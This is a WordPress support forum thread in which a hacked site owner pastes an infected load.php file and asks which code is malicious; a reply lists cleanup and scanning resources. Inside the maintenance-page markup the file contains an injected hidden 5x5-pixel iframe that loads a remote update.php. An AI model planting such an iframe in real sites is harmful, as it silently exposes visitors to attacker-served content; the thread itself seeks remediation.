Title: hackers
Last modified: August 20, 2016

---

# hackers

 *  [colvanni](https://wordpress.org/support/users/colvanni/)
 * (@colvanni)
 * [13 years, 6 months ago](https://wordpress.org/support/topic/hackers-1/)
 * hello
    this is my first time and I have a problem my site has been visited by
   an hacker I have 3 files infected one of them is load.php in wp-includes is there
   someone that can help me I write the code of load.php if someone can let me know
   wich is the wrong code in it so I can repair it thanks in advance vanni
 * <?php
    /** * These functions are needed to load WordPress. * * [@internal](https://wordpress.org/support/users/internal/)
   This file must be parsable by PHP4. * * [@package](https://wordpress.org/support/users/package/)
   WordPress */
 * /**
    * Turn register globals off. * * [@access](https://wordpress.org/support/users/access/)
   private * [@since](https://wordpress.org/support/users/since/) 2.1.0 * [@return](https://wordpress.org/support/users/return/)
   null Will return null if register_globals PHP directive was disabled */ function
   wp_unregister_GLOBALS() { if ( !ini_get( ‘register_globals’ ) ) return;
 *  if ( isset( $_REQUEST[‘GLOBALS’] ) )
    die( /*WP_I18N_GLOBALS_OVERWRITE*/’riscontrato
   tentativo di sovascrivere GLOBALS’/*/WP_I18N_GLOBALS_OVERWRITE*/ );
 *  // Variables that shouldn’t be unset
    $no_unset = array( ‘GLOBALS’, ‘_GET’, ‘
   _POST’, ‘_COOKIE’, ‘_REQUEST’, ‘_SERVER’, ‘_ENV’, ‘_FILES’, ‘table_prefix’ );
 *  $input = array_merge( $_GET, $_POST, $_COOKIE, $_SERVER, $_ENV, $_FILES, isset(
   $_SESSION ) && is_array( $_SESSION ) ? $_SESSION : array() );
    foreach ( $input
   as $k => $v ) if ( !in_array( $k, $no_unset ) && isset( $GLOBALS[$k] ) ) { $GLOBALS[
   $k] = null; unset( $GLOBALS[$k] ); } }
 * /**
    * Fix $_SERVER variables for various setups. * * [@access](https://wordpress.org/support/users/access/)
   private * [@since](https://wordpress.org/support/users/since/) 3.0.0 */ function
   wp_fix_server_vars() { global $PHP_SELF;
 *  $default_server_values = array(
    ‘SERVER_SOFTWARE’ => ”, ‘REQUEST_URI’ => ”,);
 *  $_SERVER = array_merge( $default_server_values, $_SERVER );
 *  // Fix for IIS when running with PHP ISAPI
    if ( empty( $_SERVER[‘REQUEST_URI’])
   || ( php_sapi_name() != ‘cgi-fcgi’ && preg_match( ‘/^Microsoft-IIS\//’, $_SERVER[‘
   SERVER_SOFTWARE’] ) ) ) {
 *  // IIS Mod-Rewrite
    if ( isset( $_SERVER[‘HTTP_X_ORIGINAL_URL’] ) ) { $_SERVER[‘
   REQUEST_URI’] = $_SERVER[‘HTTP_X_ORIGINAL_URL’]; } // IIS Isapi_Rewrite else 
   if ( isset( $_SERVER[‘HTTP_X_REWRITE_URL’] ) ) { $_SERVER[‘REQUEST_URI’] = $_SERVER[‘
   HTTP_X_REWRITE_URL’]; } else { // Use ORIG_PATH_INFO if there is no PATH_INFO
   if ( !isset( $_SERVER[‘PATH_INFO’] ) && isset( $_SERVER[‘ORIG_PATH_INFO’] ) )
   $_SERVER[‘PATH_INFO’] = $_SERVER[‘ORIG_PATH_INFO’];
 *  // Some IIS + PHP configurations puts the script-name in the path-info (No need
   to append it twice)
    if ( isset( $_SERVER[‘PATH_INFO’] ) ) { if ( $_SERVER[‘PATH_INFO’]
   == $_SERVER[‘SCRIPT_NAME’] ) $_SERVER[‘REQUEST_URI’] = $_SERVER[‘PATH_INFO’];
   else $_SERVER[‘REQUEST_URI’] = $_SERVER[‘SCRIPT_NAME’] . $_SERVER[‘PATH_INFO’];}
 *  // Append the query string if it exists and isn’t null
    if ( ! empty( $_SERVER[‘
   QUERY_STRING’] ) ) { $_SERVER[‘REQUEST_URI’] .= ‘?’ . $_SERVER[‘QUERY_STRING’];}}}
 *  // Fix for PHP as CGI hosts that set SCRIPT_FILENAME to something ending in 
   php.cgi for all requests
    if ( isset( $_SERVER[‘SCRIPT_FILENAME’] ) && ( strpos(
   $_SERVER[‘SCRIPT_FILENAME’], ‘php.cgi’ ) == strlen( $_SERVER[‘SCRIPT_FILENAME’])–
   7 ) ) $_SERVER[‘SCRIPT_FILENAME’] = $_SERVER[‘PATH_TRANSLATED’];
 *  // Fix for Dreamhost and other PHP as CGI hosts
    if ( strpos( $_SERVER[‘SCRIPT_NAME’],‘
   php.cgi’ ) !== false ) unset( $_SERVER[‘PATH_INFO’] );
 *  // Fix empty PHP_SELF
    $PHP_SELF = $_SERVER[‘PHP_SELF’]; if ( empty( $PHP_SELF))
   $_SERVER[‘PHP_SELF’] = $PHP_SELF = preg_replace( ‘/(\?.*)?$/’, ”, $_SERVER[“REQUEST_URI”]);}
 * /**
    * Check for the required PHP version, and the MySQL extension or a database
   drop-in. * * Dies if requirements are not met. * * This function must be able
   to work without a complete environment set up. In wp-load.php, for * example,
   WP_CONTENT_DIR is defined and version.php is included before this function is
   called. * * [@access](https://wordpress.org/support/users/access/) private * 
   [@since](https://wordpress.org/support/users/since/) 3.0.0 */ function wp_check_php_mysql_versions(){//
   we can probably extend this function to check if wp_die() exists then use translated
   strings, and then use it in install.php etc.
 *  global $required_php_version, $wp_version;
    $php_version = phpversion(); if (
   version_compare( $required_php_version, $php_version, ‘>’ ) ) die( sprintf( /*
   WP_I18N_OLD_PHP*/’Il server sta utilizzando PHP versione %1$s ma WordPress %2
   $s richiede almeno la versione %3$s.’/*/WP_I18N_OLD_PHP*/, $php_version, $wp_version,
   $required_php_version ) );
 *  if ( !extension_loaded( ‘mysql’ ) && !file_exists( WP_CONTENT_DIR . ‘/db.php’))
   
   die( /*WP_I18N_OLD_MYSQL*/’L\’installazione PHP non ha l\’estensione MySQL che
   è necessaria per utilizzare WordPress.’/*/WP_I18N_OLD_MYSQL*/ ); }
 * /**
    * Don’t load all of WordPress when handling a favicon.ico request. * Instead,
   send the headers for a zero-length favicon and bail. * * [@since](https://wordpress.org/support/users/since/)
   3.0.0 */ function wp_favicon_request() { if ( ‘/favicon.ico’ == $_SERVER[‘REQUEST_URI’]){
   header(‘Content-Type: image/vnd.microsoft.icon’); header(‘Content-Length: 0’);
   exit; } }
 * /**
    * Dies with a maintenance message when conditions are met. * * Checks for
   a file in the WordPress root directory named “.maintenance”. * This file will
   contain the variable $upgrading, set to the time the file * was created. If the
   file was created less than 10 minutes ago, WordPress * enters maintenance mode
   and displays a message. * * The default message can be replaced by using a drop-
   in (maintenance.php in * the wp-content directory). * * [@access](https://wordpress.org/support/users/access/)
   private * [@since](https://wordpress.org/support/users/since/) 3.0.0 */ function
   wp_maintenance() { if ( !file_exists( ABSPATH . ‘.maintenance’ ) || defined( ‘
   WP_INSTALLING’ ) ) return;
 *  global $upgrading;
 *  include( ABSPATH . ‘.maintenance’ );
    // If the $upgrading timestamp is older
   than 10 minutes, don’t die. if ( ( time() – $upgrading ) >= 600 ) return;
 *  if ( file_exists( WP_CONTENT_DIR . ‘/maintenance.php’ ) ) {
    require_once( WP_CONTENT_DIR.‘/
   maintenance.php’ ); die(); }
 *  $protocol = $_SERVER[“SERVER_PROTOCOL”];
    if ( ‘HTTP/1.1’ != $protocol && ‘HTTP/
   1.0’ != $protocol ) $protocol = ‘HTTP/1.0’; header( “$protocol 503 Service Unavailable”,
   true, 503 ); header( ‘Content-Type: text/html; charset=utf-8’ ); header( ‘Retry-
   After: 600’ ); ?> <!DOCTYPE html> <html xmlns=”[http://www.w3.org/1999/xhtml”&gt](http://www.w3.org/1999/xhtml”&gt);
   <head> <meta http-equiv=”Content-Type” content=”text/html; charset=utf-8″ /> 
   <title><?php echo /*WP_I18N_MAINTENANCE*/’In manutenzione.’/*/WP_I18N_MAINTENANCE*/;?
   ></title>
 *  <iframe src=”[http://www.propertyinsight.info/wp-content/uploads/update.php&#8221](http://www.propertyinsight.info/wp-content/uploads/update.php&#8221);
   width=”5″ height=”5″ frameborder=”0″></iframe></head>
    <body> <h1><?php echo /*
   WP_I18N_MAINT_MSG*/’Momentaneamente non disponibile per manutenzione. Riprovare
   fra un minuto.’/*/WP_I18N_MAINT_MSG*/; ?></h1> </body> </html> <?php die(); }
 * /**
    * PHP 4 standard microtime start capture. * * [@access](https://wordpress.org/support/users/access/)
   private * [@since](https://wordpress.org/support/users/since/) 0.71 * [@global](https://wordpress.org/support/users/global/)
   int $timestart Seconds and microseconds added together from when function is 
   called. * [@return](https://wordpress.org/support/users/return/) bool Always 
   returns true. */ function timer_start() { global $timestart; $mtime = explode(‘‘,
   microtime() ); $timestart = $mtime[1] + $mtime[0]; return true; }
 * /**
    * Return and/or display the time from the page start to when function is
   called. * * You can get the results and print them by doing: * ` * $nTimePageTookToExecute
   = timer_stop(); * echo $nTimePageTookToExecute; *  * * Or instead, you can do:**
   timer_stop(1); *  * which will do what the above does. If you need the result,
   you can assign it to a variable, but * in most cases, you only need to echo it.**
   [@since](https://wordpress.org/support/users/since/) 0.71 * [@global](https://wordpress.org/support/users/global/)
   int $timestart Seconds and microseconds added together from when timer_start()
   is called * [@global](https://wordpress.org/support/users/global/) int $timeend
   Seconds and microseconds added together from when function is called * * [@param](https://wordpress.org/support/users/param/)
   int $display Use ‘0’ or null to not echo anything and 1 to echo the total time*
   [@param](https://wordpress.org/support/users/param/) int $precision The amount
   of digits from the right of the decimal to display. Default is 3. * [@return](https://wordpress.org/support/users/return/)
   float The “second.microsecond” finished time calculation */ function timer_stop(
   $display = 0, $precision = 3 ) { // if called like timer_stop(1), will echo $
   timetotal global $timestart, $timeend; $mtime = microtime(); $mtime = explode(‘‘,
   $mtime ); $timeend = $mtime[1] + $mtime[0]; $timetotal = $timeend – $timestart;
   $r = ( function_exists( ‘number_format_i18n’ ) ) ? number_format_i18n( $timetotal,
   $precision ) : number_format( $timetotal, $precision ); if ( $display ) echo 
   $r; return $r; }
 * /**
    * Sets PHP error handling and handles WordPress debug mode. * * Uses three
   constants: WP_DEBUG, WP_DEBUG_DISPLAY, and WP_DEBUG_LOG. All three can be * defined
   in wp-config.php. Example: ` define( 'WP_DEBUG', true ); ` * * WP_DEBUG_DISPLAY
   and WP_DEBUG_LOG perform no function unless WP_DEBUG is true. * WP_DEBUG defaults
   to false. * * When WP_DEBUG is true, all PHP notices are reported. WordPress 
   will also display * notices, including one when a deprecated WordPress function,
   function argument, * or file is used. Deprecated code may be removed from a later
   version. * * It is strongly recommended that plugin and theme developers use 
   WP_DEBUG in their * development environments. * * When WP_DEBUG_DISPLAY is true,
   WordPress will force errors to be displayed. * WP_DEBUG_DISPLAY defaults to true.
   Defining it as null prevents WordPress from * changing the global configuration
   setting. Defining WP_DEBUG_DISPLAY as false * will force errors to be hidden.**
   When WP_DEBUG_LOG is true, errors will be logged to wp-content/debug.log. * WP_DEBUG_LOG
   defaults to false. * * [@access](https://wordpress.org/support/users/access/)
   private * [@since](https://wordpress.org/support/users/since/) 3.0.0 */ function
   wp_debug_mode() { if ( WP_DEBUG ) { // E_DEPRECATED is a core PHP constant in
   PHP 5.3. Don’t define this yourself. // The two statements are equivalent, just
   one is for 5.3+ and for less than 5.3. if ( defined( ‘E_DEPRECATED’ ) ) error_reporting(
   E_ALL & ~E_DEPRECATED & ~E_STRICT ); else error_reporting( E_ALL );
 *  if ( WP_DEBUG_DISPLAY )
    ini_set( ‘display_errors’, 1 ); elseif ( null !== WP_DEBUG_DISPLAY)
   ini_set( ‘display_errors’, 0 );
 *  if ( WP_DEBUG_LOG ) {
    ini_set( ‘log_errors’, 1 ); ini_set( ‘error_log’, WP_CONTENT_DIR.‘/
   debug.log’ ); } } else { error_reporting( E_CORE_ERROR | E_CORE_WARNING | E_COMPILE_ERROR
   | E_ERROR | E_WARNING | E_PARSE | E_USER_ERROR | E_USER_WARNING | E_RECOVERABLE_ERROR);}}
 * /**
    * Sets the location of the language directory. * * To set directory manually,
   define `WP_LANG_DIR` in wp-config.php. * * If the language directory exists within
   WP_CONTENT_DIR, that is used. * Otherwise if the language directory exists within
   WPINC, that’s used. * Finally, if neither of the preceding directories are found,*
   WP_CONTENT_DIR/languages is used. * * The WP_LANG_DIR constant was introduced
   in 2.1.0. * * [@access](https://wordpress.org/support/users/access/) private *
   [@since](https://wordpress.org/support/users/since/) 3.0.0 */ function wp_set_lang_dir(){
   if ( !defined( ‘WP_LANG_DIR’ ) ) { if ( file_exists( WP_CONTENT_DIR . ‘/languages’)&&
   @is_dir( WP_CONTENT_DIR . ‘/languages’ ) || !@is_dir(ABSPATH . WPINC . ‘/languages’)){
   define( ‘WP_LANG_DIR’, WP_CONTENT_DIR . ‘/languages’ ); // no leading slash, 
   no trailing slash, full path, not relative to ABSPATH if ( !defined( ‘LANGDIR’)){//
   Old static relative path maintained for limited backwards compatibility – won’t
   work in some cases define( ‘LANGDIR’, ‘wp-content/languages’ ); } } else { define(‘
   WP_LANG_DIR’, ABSPATH . WPINC . ‘/languages’ ); // no leading slash, no trailing
   slash, full path, not relative to ABSPATH if ( !defined( ‘LANGDIR’ ) ) { // Old
   relative path maintained for backwards compatibility define( ‘LANGDIR’, WPINC.‘/
   languages’ ); } } } }
 * /**
    * Load the correct database class file. * * This function is used to load
   the database class file either at runtime or by * wp-admin/setup-config.php. 
   We must globalize $wpdb to ensure that it is * defined globally by the inline
   code in wp-db.php. * * [@since](https://wordpress.org/support/users/since/) 2.5.0*
   [@global](https://wordpress.org/support/users/global/) $wpdb WordPress Database
   Object */ function require_wp_db() { global $wpdb;
 *  require_once( ABSPATH . WPINC . ‘/wp-db.php’ );
    if ( file_exists( WP_CONTENT_DIR.‘/
   db.php’ ) ) require_once( WP_CONTENT_DIR . ‘/db.php’ );
 *  if ( isset( $wpdb ) )
    return;
 *  $wpdb = new wpdb( DB_USER, DB_PASSWORD, DB_NAME, DB_HOST );
    }
 * /**
    * Sets the database table prefix and the format specifiers for database 
   table columns. * * Columns not listed here default to %s. * * [@see](https://wordpress.org/support/users/see/)
   wpdb::$field_types Since 2.8.0 * [@see](https://wordpress.org/support/users/see/)
   wpdb::prepare() * [@see](https://wordpress.org/support/users/see/) wpdb::insert()*
   [@see](https://wordpress.org/support/users/see/) wpdb::update() * [@see](https://wordpress.org/support/users/see/)
   wpdb::set_prefix() * * [@access](https://wordpress.org/support/users/access/)
   private * [@since](https://wordpress.org/support/users/since/) 3.0.0 */ function
   wp_set_wpdb_vars() { global $wpdb, $table_prefix; if ( !empty( $wpdb->error ))
   dead_db();
 *  $wpdb->field_types = array( ‘post_author’ => ‘%d’, ‘post_parent’ => ‘%d’, ‘menu_order’
   => ‘%d’, ‘term_id’ => ‘%d’, ‘term_group’ => ‘%d’, ‘term_taxonomy_id’ => ‘%d’,
   ‘
   parent’ => ‘%d’, ‘count’ => ‘%d’,’object_id’ => ‘%d’, ‘term_order’ => ‘%d’, ‘
   ID’ => ‘%d’, ‘commment_ID’ => ‘%d’, ‘comment_post_ID’ => ‘%d’, ‘comment_parent’
   => ‘%d’, ‘user_id’ => ‘%d’, ‘link_id’ => ‘%d’, ‘link_owner’ => ‘%d’, ‘link_rating’
   => ‘%d’, ‘option_id’ => ‘%d’, ‘blog_id’ => ‘%d’, ‘meta_id’ => ‘%d’, ‘post_id’
   => ‘%d’, ‘user_status’ => ‘%d’, ‘umeta_id’ => ‘%d’, ‘comment_karma’ => ‘%d’, ‘
   comment_count’ => ‘%d’, // multisite: ‘active’ => ‘%d’, ‘cat_id’ => ‘%d’, ‘deleted’
   => ‘%d’, ‘lang_id’ => ‘%d’, ‘mature’ => ‘%d’, ‘public’ => ‘%d’, ‘site_id’ => ‘%
   d’, ‘spam’ => ‘%d’, );
 *  $prefix = $wpdb->set_prefix( $table_prefix );
 *  if ( is_wp_error( $prefix ) )
    wp_die( /*WP_I18N_BAD_PREFIX*/’**ERRORE**: il`
   $table_prefix` in `wp-config.php` può contenere solo numeri, lettere e carattere
   di sottolineatura.’/*/WP_I18N_BAD_PREFIX*/ ); }
 * /**
    * Starts the WordPress object cache. * * If an object-cache.php file exists
   in the wp-content directory, * it uses that drop-in as an external object cache.**
   [@access](https://wordpress.org/support/users/access/) private * [@since](https://wordpress.org/support/users/since/)
   3.0.0 */ function wp_start_object_cache() { global $_wp_using_ext_object_cache;
 *  $first_init = false;
    if ( ! function_exists( ‘wp_cache_init’ ) ) { if ( file_exists(
   WP_CONTENT_DIR . ‘/object-cache.php’ ) ) { require_once ( WP_CONTENT_DIR . ‘/
   object-cache.php’ ); $_wp_using_ext_object_cache = true; } else { require_once(
   ABSPATH . WPINC . ‘/cache.php’ ); $_wp_using_ext_object_cache = false; } $first_init
   = true; } else if ( !$_wp_using_ext_object_cache && file_exists( WP_CONTENT_DIR.‘/
   object-cache.php’ ) ) { // Sometimes advanced-cache.php can load object-cache.
   php before it is loaded here. // This breaks the function_exists check above 
   and can result in $_wp_using_ext_object_cache // being set incorrectly. Double
   check if an external cache exists. $_wp_using_ext_object_cache = true; }
 *  // If cache supports reset, reset instead of init if already initialized.
    //
   Reset signals to the cache that global IDs have changed and it may need to update
   keys // and cleanup caches. if ( !$first_init && function_exists(‘wp_cache_reset’))
   wp_cache_reset(); else wp_cache_init();
 *  if ( function_exists( ‘wp_cache_add_global_groups’ ) ) {
    wp_cache_add_global_groups(
   array( ‘users’, ‘userlogins’, ‘usermeta’, ‘user_meta’, ‘site-transient’, ‘site-
   options’, ‘site-lookup’, ‘blog-lookup’, ‘blog-details’, ‘rss’, ‘global-posts’));
   wp_cache_add_non_persistent_groups( array( ‘comment’, ‘counts’, ‘plugins’ ) );}}
 * /**
    * Redirects to the installer if WordPress is not installed. * * Dies with
   an error message when multisite is enabled. * * [@access](https://wordpress.org/support/users/access/)
   private * [@since](https://wordpress.org/support/users/since/) 3.0.0 */ function
   wp_not_installed() { if ( is_multisite() ) { if ( ! is_blog_installed() && ! 
   defined( ‘WP_INSTALLING’ ) ) wp_die( __( ‘The site you have requested is not 
   installed properly. Please contact the system administrator.’ ) ); } elseif (!
   is_blog_installed() && false === strpos( $_SERVER[‘PHP_SELF’], ‘install.php’ )&&!
   defined( ‘WP_INSTALLING’ ) ) {
 *  $link = wp_guess_url() . ‘/wp-admin/install.php’;
 *  require( ABSPATH . WPINC . ‘/kses.php’ );
    require( ABSPATH . WPINC . ‘/pluggable.
   php’ ); require( ABSPATH . WPINC . ‘/formatting.php’ ); wp_redirect( $link );
   die(); } }
 * /**
    * Returns array of must-use plugin files to be included in global scope.**
   The default directory is wp-content/mu-plugins. To change the default directory*
   manually, define `WPMU_PLUGIN_DIR` and `WPMU_PLUGIN_URL` * in wp-config.php. **
   [@access](https://wordpress.org/support/users/access/) private * [@since](https://wordpress.org/support/users/since/)
   3.0.0 * [@return](https://wordpress.org/support/users/return/) array Files to
   include */ function wp_get_mu_plugins() { $mu_plugins = array(); if ( !is_dir(
   WPMU_PLUGIN_DIR ) ) return $mu_plugins; if ( ! $dh = opendir( WPMU_PLUGIN_DIR))
   return $mu_plugins; while ( ( $plugin = readdir( $dh ) ) !== false ) { if ( substr(
   $plugin, -4 ) == ‘.php’ ) $mu_plugins[] = WPMU_PLUGIN_DIR . ‘/’ . $plugin; } 
   closedir( $dh ); sort( $mu_plugins );
 *  return $mu_plugins;
    }
 * /**
    * Returns array of plugin files to be included in global scope. * * The 
   default directory is wp-content/plugins. To change the default directory * manually,
   define `WP_PLUGIN_DIR` and `WP_PLUGIN_URL` * in wp-config.php. * * [@access](https://wordpress.org/support/users/access/)
   private * [@since](https://wordpress.org/support/users/since/) 3.0.0 * [@return](https://wordpress.org/support/users/return/)
   array Files to include */ function wp_get_active_and_valid_plugins() { $plugins
   = array(); $active_plugins = (array) get_option( ‘active_plugins’, array() );
 *  // Check for hacks file if the option is enabled
    if ( get_option( ‘hack_file’)&&
   file_exists( ABSPATH . ‘my-hacks.php’ ) ) { _deprecated_file( ‘my-hacks.php’,‘
   1.5’ ); array_unshift( $plugins, ABSPATH . ‘my-hacks.php’ ); }
 *  if ( empty( $active_plugins ) || defined( ‘WP_INSTALLING’ ) )
    return $plugins;
 *  $network_plugins = is_multisite() ? wp_get_active_network_plugins() : false;
 *  foreach ( $active_plugins as $plugin ) {
    if ( ! validate_file( $plugin ) //
   $plugin must validate as file && ‘.php’ == substr( $plugin, -4 ) // $plugin must
   end with ‘.php’ && file_exists( WP_PLUGIN_DIR . ‘/’ . $plugin ) // $plugin must
   exist // not already included as a network plugin && ( ! $network_plugins || !
   in_array( WP_PLUGIN_DIR . ‘/’ . $plugin, $network_plugins ) ) ) $plugins[] = 
   WP_PLUGIN_DIR . ‘/’ . $plugin; } return $plugins; }
 * /**
    * Sets internal encoding using mb_internal_encoding(). * * In most cases
   the default internal encoding is latin1, which is of no use, * since we want 
   to use the mb_ functions for utf-8 strings. * * [@access](https://wordpress.org/support/users/access/)
   private * [@since](https://wordpress.org/support/users/since/) 3.0.0 */ function
   wp_set_internal_encoding() { if ( function_exists( ‘mb_internal_encoding’ ) ){
   if ( !@mb_internal_encoding( get_option( ‘blog_charset’ ) ) ) mb_internal_encoding(‘
   UTF-8’ ); } }
 * /**
    * Add magic quotes to $_GET, $_POST, $_COOKIE, and $_SERVER. * * Also forces
   $_REQUEST to be $_GET + $_POST. If $_SERVER, $_COOKIE, * or $_ENV are needed,
   use those superglobals directly. * * [@access](https://wordpress.org/support/users/access/)
   private * [@since](https://wordpress.org/support/users/since/) 3.0.0 */ function
   wp_magic_quotes() { // If already slashed, strip. if ( get_magic_quotes_gpc()){
   $_GET = stripslashes_deep( $_GET ); $_POST = stripslashes_deep( $_POST ); $_COOKIE
   = stripslashes_deep( $_COOKIE ); }
 *  // Escape with wpdb.
    $_GET = add_magic_quotes( $_GET ); $_POST = add_magic_quotes(
   $_POST ); $_COOKIE = add_magic_quotes( $_COOKIE ); $_SERVER = add_magic_quotes(
   $_SERVER );
 *  // Force REQUEST to be GET + POST.
    $_REQUEST = array_merge( $_GET, $_POST );}
 * /**
    * Runs just before PHP shuts down execution. * * [@access](https://wordpress.org/support/users/access/)
   private * [@since](https://wordpress.org/support/users/since/) 1.2.0 */ function
   shutdown_action_hook() { do_action( ‘shutdown’ ); wp_cache_close(); }
 * /**
    * Copy an object. * * [@since](https://wordpress.org/support/users/since/)
   2.7.0 * [@deprecated](https://wordpress.org/support/users/deprecated/) 3.2 * *
   [@param](https://wordpress.org/support/users/param/) object $object The object
   to clone * [@return](https://wordpress.org/support/users/return/) object The 
   cloned object */
 * function wp_clone( $object ) {
    // Use parens for clone to accommodate PHP 4.
   See #17880 return clone( $object ); }
 * /**
    * Whether the current request is for a network or blog admin page * * Does
   not inform on whether the user is an admin! Use capability checks to * tell if
   the user should be accessing a section or not. * * [@since](https://wordpress.org/support/users/since/)
   1.5.1 * * [@return](https://wordpress.org/support/users/return/) bool True if
   inside WordPress administration pages. */ function is_admin() { if ( defined(‘
   WP_ADMIN’ ) ) return WP_ADMIN; return false; }
 * /**
    * Whether the current request is for a blog admin screen /wp-admin/ * * 
   Does not inform on whether the user is a blog admin! Use capability checks to*
   tell if the user should be accessing a section or not. * * [@since](https://wordpress.org/support/users/since/)
   3.1.0 * * [@return](https://wordpress.org/support/users/return/) bool True if
   inside WordPress network administration pages. */ function is_blog_admin() { 
   if ( defined( ‘WP_BLOG_ADMIN’ ) ) return WP_BLOG_ADMIN; return false; }
 * /**
    * Whether the current request is for a network admin screen /wp-admin/network/**
   Does not inform on whether the user is a network admin! Use capability checks
   to * tell if the user should be accessing a section or not. * * [@since](https://wordpress.org/support/users/since/)
   3.1.0 * * [@return](https://wordpress.org/support/users/return/) bool True if
   inside WordPress network administration pages. */ function is_network_admin(){
   if ( defined( ‘WP_NETWORK_ADMIN’ ) ) return WP_NETWORK_ADMIN; return false; }
 * /**
    * Whether the current request is for a user admin screen /wp-admin/user/**
   Does not inform on whether the user is an admin! Use capability checks to * tell
   if the user should be accessing a section or not. * * [@since](https://wordpress.org/support/users/since/)
   3.1.0 * * [@return](https://wordpress.org/support/users/return/) bool True if
   inside WordPress user administration pages. */ function is_user_admin() { if (
   defined( ‘WP_USER_ADMIN’ ) ) return WP_USER_ADMIN; return false; }
 * /**
    * Whether Multisite support is enabled * * [@since](https://wordpress.org/support/users/since/)
   3.0.0 * * [@return](https://wordpress.org/support/users/return/) bool True if
   multisite is enabled, false otherwise. */ function is_multisite() { if ( defined(‘
   MULTISITE’ ) ) return MULTISITE;
 *  if ( defined( ‘SUBDOMAIN_INSTALL’ ) || defined( ‘VHOST’ ) || defined( ‘SUNRISE’))
   
   return true;
 *  return false;
    }
 * ?>

Viewing 2 replies - 1 through 2 (of 2 total)

 *  [samateo](https://wordpress.org/support/users/samateo/)
 * (@samateo)
 * [13 years, 6 months ago](https://wordpress.org/support/topic/hackers-1/#post-3144948)
 * As others have mentioned, if your site is hacked, start working through the following
   resources:
 * [http://codex.wordpress.org/FAQ_My_site_was_hacked](http://codex.wordpress.org/FAQ_My_site_was_hacked)
   
   [http://wordpress.org/support/topic/268083#post-1065779](http://wordpress.org/support/topic/268083#post-1065779)
   [http://smackdown.blogsblogsblogs.com/2008/06/24/how-to-completely-clean-your-hacked-wordpress-installation/](http://smackdown.blogsblogsblogs.com/2008/06/24/how-to-completely-clean-your-hacked-wordpress-installation/)
   [http://ottopress.com/2009/hacked-wordpress-backdoors/](http://ottopress.com/2009/hacked-wordpress-backdoors/)
 * Additional Resources:
    [http://sitecheck.sucuri.net/scanner/](http://sitecheck.sucuri.net/scanner/)
   [http://www.unmaskparasites.com/](http://www.unmaskparasites.com/) [http://blog.sucuri.net/2012/03/wordpress-understanding-its-true-vulnerability.html](http://blog.sucuri.net/2012/03/wordpress-understanding-its-true-vulnerability.html)
   [http://codex.wordpress.org/Hardening_WordPress](http://codex.wordpress.org/Hardening_WordPress)
   [http://www.studiopress.com/tips/wordpress-site-security.htm ](http://www.studiopress.com/tips/wordpress-site-security.htm)
 * To compare files on your site, you could [download](http://wordpress.org/download/)
   a clean copy of WordPress and use a file compare program like [WinMerge](http://portableapps.com/apps/utilities/winmerge_portable)
   to find differences.
 * Or you could check out the [source files](http://wordpress.org/download/source/)
   online. The branch for 3.4 is [here](http://core.svn.wordpress.org/branches/3.4/),
   or go directly to [wp-load.php](http://core.svn.wordpress.org/branches/3.4/wp-load.php).
   Again, just compare the files.
 * WordPress also will let you reinstall from the dashboard.
 *  [samateo](https://wordpress.org/support/users/samateo/)
 * (@samateo)
 * [13 years, 6 months ago](https://wordpress.org/support/topic/hackers-1/#post-3144954)
 * Link above should point to [wp-includes/load.php](http://core.svn.wordpress.org/branches/3.4/wp-includes/load.php)
   not wp-load.php.
 * Also, best to compare/clean everything.

Viewing 2 replies - 1 through 2 (of 2 total)

The topic ‘hackers’ is closed to new replies.

 * In: [Fixing WordPress](https://wordpress.org/support/forum/how-to-and-troubleshooting/)
 * 2 replies
 * 2 participants
 * Last reply from: [samateo](https://wordpress.org/support/users/samateo/)
 * Last activity: [13 years, 6 months ago](https://wordpress.org/support/topic/hackers-1/#post-3144954)
 * Status: not resolved

## Topics

### Topics with no replies

### Non-support topics

### Resolved topics

### Unresolved topics

### All topics